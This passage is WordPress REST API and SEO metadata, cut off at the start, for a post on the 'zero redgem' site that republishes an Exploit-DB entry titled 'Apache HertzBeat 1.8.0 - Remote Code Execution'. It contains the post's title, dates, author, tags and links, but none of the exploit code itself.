redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Apache HertzBeat 1.8.0 - Remote Code Execution_EDB-ID:52563 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=54458","og_locale":"en_US","og_type":"article","og_title":"Apache HertzBeat 1.8.0 - Remote Code Execution_EDB-ID:52563 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-05-14T13:28:58&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: Apache HertzBeat 1.8.0 &#8211; Remote Code Execution Google Dork: N\/A Date: 2026-03-09 Exploit Author: Brett Gervasoni Vendor Homepage: https:\/\/hertzbeat.apache.org\/ Software Link: https:\/\/github.com\/apache\/hertzbeat\/releases Version:...","og_url":"https:\/\/zero.redgem.net\/?p=54458","og_site_name":"zero redgem","article_published_time":"2026-05-14T08:47:58+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=54458#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=54458"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Apache HertzBeat 1.8.0 &#8211; Remote Code Execution_EDB-ID:52563","datePublished":"2026-05-14T08:47:58+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=54458"},"wordCount":2255,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","exploitdb","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=54458#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=54458","url":"https:\/\/zero.redgem.net\/?p=54458","name":"Apache HertzBeat 1.8.0 - Remote Code Execution_EDB-ID:52563 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-14T08:47:58+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=54458#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=54458"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=54458#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Apache HertzBeat 1.8.0 &#8211; Remote Code Execution_EDB-ID:52563"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/54458","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=54458"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/54458\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=54458"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=54458"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=54458"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}